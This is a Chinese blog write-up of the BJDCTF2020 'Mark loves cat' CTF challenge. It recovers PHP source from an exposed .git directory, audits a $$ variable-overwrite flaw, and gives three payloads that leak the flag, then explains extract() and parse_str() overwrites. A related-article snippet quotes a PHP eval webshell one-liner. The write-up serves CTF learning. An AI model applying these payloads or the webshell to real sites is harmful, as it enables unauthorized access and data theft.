[BJDCTF2020]Mark loves cat |变量覆盖(三解)

最新推荐文章于 2024-02-29 22:57:27 发布
最新推荐文章于 2024-02-29 22:57:27 发布
阅读量707 收藏 1
点赞数 1
分类专栏: # web安全 文章标签: php 开发语言 web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/129823793
版权

目录

信息收集

代码泄露

代码审计

payload1

payload2

payload3

补充

全局变量覆盖

extract()变量覆盖

parse_str()变量覆盖

信息收集

代码泄露

200     /.git/HEAD
200     /.git/index
200     /.git/config
200     /.git/description

200     /flag.php

python githack.py url:81/.git/

buu这边环境有点问题,我们直接拿wp里面的源码进行审计

  • flag.php
<?php
    $flag = file_get_contents('/flag');
?>
  • index.php
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

echo "the flag is: ".$flag;
?>

$$ 导致的变量覆盖问题在CTF代码审计题目中经常在foreach中出现,如以下的示例代码,使用foreach来遍历数组中的值,然后再将获取到的数组键名作为变量,数组中的键值作为变量的值。因此就产生了变量覆盖漏洞。请求?name=test 会将$name的值覆盖,变为test。

代码审计

定义了三个变量并对三个变量进行了输出,但是我们想要的是输出flag的值,这里就想到了变量覆盖的问题,源代码中存在多个变量输出的地方,应该是都可以覆盖成flag进行输出

payload1

?handsome=flag&flag=handsome

payload2

?yds=flag

payload3

is=flag&flag=flag

补充

全局变量覆盖

register_globals的意思是注册为全局变量,所以当为On的时候,传递过来的值会被直接注册为全局变量直接使用,而Off的时候,我们需要到特定的数组里去得到它

<?php  
$id=0;
echo "Register_globals: ".(int)ini_get("register_globals")."<br/>";   
//ini_get — 获取一个配置选项的值
echo '$_GET["id"] :'.$_GET['id']."<br/>";
echo '$id :'.$id;
?>

?id=4

Register_globals: 0
$_GET["id"] :4
$id :0

当register_globals=Off的时候,程序接收的时候应该用$_GET['id']来接受传递过来的值;
当register_globals=On的时候,程序可以直接使用$id来接受值,也可以用$_GET['id']来接受传递过来的值。
通过这种方式就可以向程序注册一个之前没有声明的变量,不过如果之前变量已经存在就无法覆盖掉,原已有变量值不变。

如,上面的代码中,已经对变量$id赋了初始值,比如$id=0,那么即使在URL中有/test.php?id=1,也不会将变量覆盖,id值为0

extract()变量覆盖

extract() 函数从数组中将变量导入到当前的符号表。

该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。

<?php
$a = "Original";
$my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse");
extract($my_array);
echo "\$a = $a; \$b = $b; \$c = $c";
?>
//运行结果:$a = Cat; $b = Dog; $c = Horse(Cat将Original覆盖了)

?auth=1

<?php  
    $auth = '0';  
    // 这里可以覆盖$auth的变量值
    extract($_GET);   
    if($auth == 1){  
        echo "private!";  
    } else{  
        echo "public!";  
    }  
?>
// 构造payload:?auth=1即可

parse_str()变量覆盖

// 把查询字符串解析到变量中:
<?php
parse_str("name=Peter&age=43");
echo $name."<br>";
echo $age;
?>

Peter
43

coleak
关注
专栏目录
[BJDCTF2020]Mark loves cat (两种解法)(变量覆盖漏洞)
qq_43622442的博客
05-04 8337
[BJDCTF2020]Mark loves cat (两种解法)(变量覆盖漏洞) 这几天被学生机折磨死了,第一次用好多不熟练,刷个题压压惊。 1.拿到网站,发现所有的超链接都是指向自己的:(两种答案都在最后) 2.扫描目录找到 .git 泄露: (做ctf题要习惯用dirsearch,而且要调低线程): dirsearch.py -u url -e * --timeout=2 -t 1 ...
------已搬运-------BUUCTF:[BJDCTF2020]Mark loves cat (两种解法)(变量覆盖漏洞)
Zero_Adam的博客
02-12 446
主要锻炼一下变量覆盖那些绕绕的东西。 git泄露,,这个还没好,等问问班长的 获得源码后: index.php <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($_GET as $x => $y){ $$x = $$y; } foreach($_GET as $x => $y
Bugku-代码审计-extract变量覆盖
多崎巡礼的博客
08-23 1856
代码审计|变量覆盖漏洞 0×00 背景 近期在研究学习变量覆盖漏洞的问题,于是就把之前学习的和近期看到的CTF题目中有关变量覆盖的题目结合下进一步研究。  通常将可以用自定义的参数值替换原有变量值的情况称为变量覆盖漏洞。经常导致变量覆盖漏洞场景有:$$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开...
变量覆盖漏洞总结
qq_45521281的博客
04-30 3280
什么是变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:**$$**使用不当,**extract()**函数使用不当,**parse_str()**函数使用不当,**import_request_variables()**使用不当,开启了全局变量注册等。 几种变量覆盖漏洞 全局变量覆盖 register_globals的意思就是注册为全局变量,所以当为O...
变量覆盖漏洞
qq_58970968的博客
07-21 293
知识点$$变量覆盖漏洞参考,意思就是说,存在一些函数比如exit()extract()函数使用不当,函数使用不当,使用不当,包含了变量,如果get传参等方式就会覆盖之前的变量,达到控制变量而读取flag;诸如出现echoxxx.$flag。......
BugkuCTF_代码审计——“extract变量覆盖
Ho1aAs‘s Blog
09-07 516
文章目录一、思考分析二、解题过程完 一、思考分析 题目是审计如下php代码 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> 文件名为xxx,通过GET方法提交覆盖后文件名(&flag)、提交文件内容(&a
[BJDCTF2020]Mark loves cat变量覆盖
sGanYu
10-18 1028
首先用dirsearch扫描下目录 由于BUUCTF限制发包量,更改扫描线程 命令:python dirsearch .py -u [url] -e * -t 3 -s 0.2, 扫除/.git泄露 得到两个php文件,kali内githack扫出来但是下载失败了 flag.php <?php $flag = file_get_contents('/flag'); ?> index.php <?php include 'flag.php'; $yds = ..
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
变量覆盖漏洞分析:从BUUCTF-Web-Mark loves cat挑战看PHP安全
文章还通过一个名为`BJDCTF2020`的CTF挑战展示了如何利用变量覆盖。在这个例子中,挑战者需要通过分析泄露的`.git`目录获取信息,然后运行特定的Python脚本来解析数据。最终,他们发现了一个含有可变变量PHP代码段...
【愚公系列】2024年03月 《CTF实战:从入门到提升》 008-Web安全入门(PHP变量覆盖漏洞)
最新发布
时光隧道
02-29 6万+
PHP变量覆盖漏洞是一种安全漏洞,发生在PHP代码中。它可以允许攻击者通过覆盖一个或多个变量的值来绕过身份验证或控制程序的执行流程。具体来说,当PHP代码中的某个变量没有经过正确的输入验证或过滤时,攻击者可以通过提交恶意数据来覆盖变量的值。这可能导致程序执行不受控制的行为,例如绕过身份验证、窃取敏感数据或执行恶意代码。PHP变量覆盖漏洞通常与其他漏洞一起利用,例如未经验证的用户输入、弱密码或不安全的文件上传功能。避免这类漏洞的最佳做法是始终对用户输入进行验证和过滤,并确保所有使用的变量都是安全的。
BUUCTF训练打卡
Leo8283的博客
04-26 682
BJDCTF2020]ZJCTF,不过如此 首先 ?text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64- encode/resource=next.php 或者 者 https://www.cnblogs.com/wangtanzhi/p/12328083.html https://xz.aliyun.com/t/2557 payload:/S*=${phpinf
BUUCTF 个人做题记录【6-24】
qq_61620566的博客
06-24 970
学习笔记,大佬勿喷
[BUUCTF] 集训第二天
Dannie01的博客
09-29 432
补题 [GXYCTF2019]BabyUpload1 正常开端一句话木马 <?php eval($_POST[cmd]);?> php文件不许上传, 尝试上传jpg 换个姿势改一下内容 <script language='php'>eval($_POST[cmd]);</script> 上传成功,记得这个路径 因为是jpg文件,无法解析php,观察是Apache server,上传.htaccess文件来将其他文件解析成PHP文件 .htaccess文件是Apa
2020/7/08 - [BJDCTF2020]Mark loves cat - git源码泄露/$$变量覆盖
抒情诗
07-08 272
文章目录可以利用yds就是原值为cat的那个最终payload 首先用dirsearch扫描一下目录,发现/.git源码泄露,使用githack将源码下载下来,在github里面搜lijiejie的githack,真的很好用,点一大波赞,下面是index.php里有用的内容 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x
PHP---引用使用foreach(xxx as &$x)时候的坑。
Gavin_new的博客
12-15 5116
注意如下一段代码:$data1 = ["1","2","3"]; $data2 = ["4","5","6"]; $all = 0; foreach($data1 as &$x){ $all += $x } #注意这里$x是$data1最后一个元素的引用 $all2 = 0; foreach($data2 as $x=>$y){ $all2 += ($y+$data1[$x]); //
[BJDCTF2020]Mark loves cat 1——(超详细 三种方法)
m0_62879498的博客
05-05 3390
[BJDCTF2020]Mark loves cat 1 一进入环境,毫无头绪 拿御剑 或者 dirsearch 扫出了 .git/ 可以猜出,本关一定与git源码泄露有关 我们使用GitHack 看能否从网站上扒出源码 图上可以看出 确实存在 git泄露 但,查看文件后却没有找到 php文件 。估计是ctf环境的问题 可以git init 初始化一下,然后不停的试,总有运气好的一次,能够从网站上扒出源码文件。(也可以直接从网上直接找 ) <?php include 'flag.php';
BUUCTF__web题解合集(二)
风过江南乱的博客
07-25 974
[GYCTF2020]Blacklist、 [SUCTF 2019]Pythonginx、 [BJDCTF2020]Mark loves cat、 [BJDCTF 2nd]old-hack、 [GWCTF 2019]我有一个数据库、
BUUCTF 19
qq_52431855的博客
02-01 549
知识点 PHP foreach循环 PHP foreach 循环结构是遍历数组时常用的方法,foreach 仅能够应用于数组和对象,如果尝试应用于其他数据类型的变量或者未初始化的变量将发出错误信息。 foreach 有以下两种语法格式: //格式1 foreach (array_expression as $value){ statement } //格式2 foreach (array_expression as $key => $value){ statem...
[BJDCTF2020]Mark loves cat
shawdow_bug的博客
06-14 146
CTF
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值